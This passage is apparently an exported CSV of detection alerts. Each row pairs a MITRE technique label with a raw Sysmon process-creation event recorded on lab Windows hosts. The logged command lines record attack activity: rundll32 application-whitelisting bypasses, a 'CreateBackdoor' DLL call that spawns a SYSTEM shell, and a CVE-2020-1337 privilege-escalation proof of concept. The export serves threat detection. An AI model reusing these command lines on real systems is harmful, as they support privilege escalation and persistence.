</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:57:36.014784Z"">
</TimeCreated>
<EventRecordID>423994</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:57:36.012</Data>
<Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-001036A15B00</Data>
<Data Name=""ProcessId"">3396</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
<Data Name=""LogonId"">0x8a585</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51CD-5F93-0000-001073735B00</Data>
<Data Name=""ParentProcessId"">7624</Data>
<Data Name=""ParentImage"">C:\Users\Public\test.tmp</Data>
<Data Name=""ParentCommandLine"">c:\Users\Public\test.tmp </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:57:36.014784Z"">
</TimeCreated>
<EventRecordID>423994</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:57:36.012</Data>
<Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-001036A15B00</Data>
<Data Name=""ProcessId"">3396</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
<Data Name=""LogonId"">0x8a585</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51CD-5F93-0000-001073735B00</Data>
<Data Name=""ParentProcessId"">7624</Data>
<Data Name=""ParentImage"">C:\Users\Public\test.tmp</Data>
<Data Name=""ParentCommandLine"">c:\Users\Public\test.tmp </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:57:36.014784Z"">
</TimeCreated>
<EventRecordID>423994</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:57:36.012</Data>
<Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-001036A15B00</Data>
<Data Name=""ProcessId"">3396</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
<Data Name=""LogonId"">0x8a585</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51CD-5F93-0000-001073735B00</Data>
<Data Name=""ParentProcessId"">7624</Data>
<Data Name=""ParentImage"">C:\Users\Public\test.tmp</Data>
<Data Name=""ParentCommandLine"">c:\Users\Public\test.tmp </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1584766840.502366,2020-03-21T09:00:40.502366+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:39.441933Z"">
</TimeCreated>
<EventRecordID>243568</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:39.417</Data>
<Data Name=""ProcessGuid"">747F3D96-9F77-5E75-0000-001090F32000</Data>
<Data Name=""ProcessId"">2416</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9F61-5E75-0000-0010686A1E00</Data>
<Data Name=""ParentProcessId"">4848</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237563.487498,2020-08-12T17:06:03.487498+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:06:01.637860Z"">
</TimeCreated>
<EventRecordID>342412</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:06:01.636</Data>
<Data Name=""ProcessGuid"">747F3D96-E939-5F33-0000-0010ACAB0E00</Data>
<Data Name=""ProcessId"">7852</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e</Data>
<Data Name=""CurrentDirectory"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
<Data Name=""LogonId"">0x41c24</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E938-5F33-0000-00109CA00E00</Data>
<Data Name=""ParentProcessId"">7820</Data>
<Data Name=""ParentImage"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe</Data>
<Data Name=""ParentCommandLine"">WerTrigger.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Detect IIS/Exchange Exploitation,1558885676.667118,2019-05-26T19:47:56.667118+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\notepad.exe) and commandline ( C:\Windows\System32\notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-26T15:47:56.667118Z"">
</TimeCreated>
<EventRecordID>5408</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-26 15:47:56.627</Data>
<Data Name=""ProcessGuid"">365ABB72-B52C-5CEA-0000-00107A0D1100</Data>
<Data Name=""ProcessId"">3388</Data>
<Data Name=""Image"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Notepad</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC64B1EF19E7F35642B2A2EA5F5D9F4246866243,MD5=A4F6DF0E33E644E802C8798ED94D80EA,SHA256=B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B,IMPHASH=53A6715F589E88C4FD4541C81B4F57C3</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B26B-5CEA-0000-0010582A0800</Data>
<Data Name=""ParentProcessId"">2744</Data>
<Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
<Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1579034897.447948,2020-01-15T00:48:17.447948+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd.exe&quot; /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:48:17.412145Z"">
</TimeCreated>
<EventRecordID>345</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:48:17.270</Data>
<Data Name=""ProcessGuid"">747F3D96-2911-5E1E-0000-0010D80A7D00</Data>
<Data Name=""ProcessId"">2416</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;cmd.exe&quot; /c notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2910-5E1E-0000-002082EF7C00</Data>
<Data Name=""LogonId"">0x7cef82</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-001053F57C00</Data>
<Data Name=""ParentProcessId"">4448</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c start ms-browser://</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564909835.391457,2019-08-04T13:10:35.391457+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-04T09:10:30.972590Z"">
</TimeCreated>
<EventRecordID>5703</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-04 09:10:30.702</Data>
<Data Name=""ProcessGuid"">747F3D96-A106-5D46-0000-00102425BD03</Data>
<Data Name=""ProcessId"">6604</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-A106-5D46-0000-00107201BD03</Data>
<Data Name=""ParentProcessId"">1380</Data>
<Data Name=""ParentImage"">C:\Windows\System32\control.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\control.exe&quot; /name Microsoft.BackupAndRestoreCenter</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237562.552084,2020-08-12T17:06:02.552084+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e &gt; nul 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:06:00.737148Z"">
</TimeCreated>
<EventRecordID>342411</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:06:00.734</Data>
<Data Name=""ProcessGuid"">747F3D96-E938-5F33-0000-00101CA50E00</Data>
<Data Name=""ProcessId"">7836</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e &gt; nul 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
<Data Name=""LogonId"">0x41c24</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E938-5F33-0000-00109CA00E00</Data>
<Data Name=""ParentProcessId"">7820</Data>
<Data Name=""ParentImage"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe</Data>
<Data Name=""ParentCommandLine"">WerTrigger.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:48:17.044002Z"">
</TimeCreated>
<EventRecordID>344</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:48:16.990</Data>
<Data Name=""ProcessGuid"">747F3D96-2910-5E1E-0000-001053F57C00</Data>
<Data Name=""ProcessId"">4448</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /c start ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2910-5E1E-0000-002082EF7C00</Data>
<Data Name=""LogonId"">0x7cef82</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
<Data Name=""ParentProcessId"">4612</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:48:17.044002Z"">
</TimeCreated>
<EventRecordID>344</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
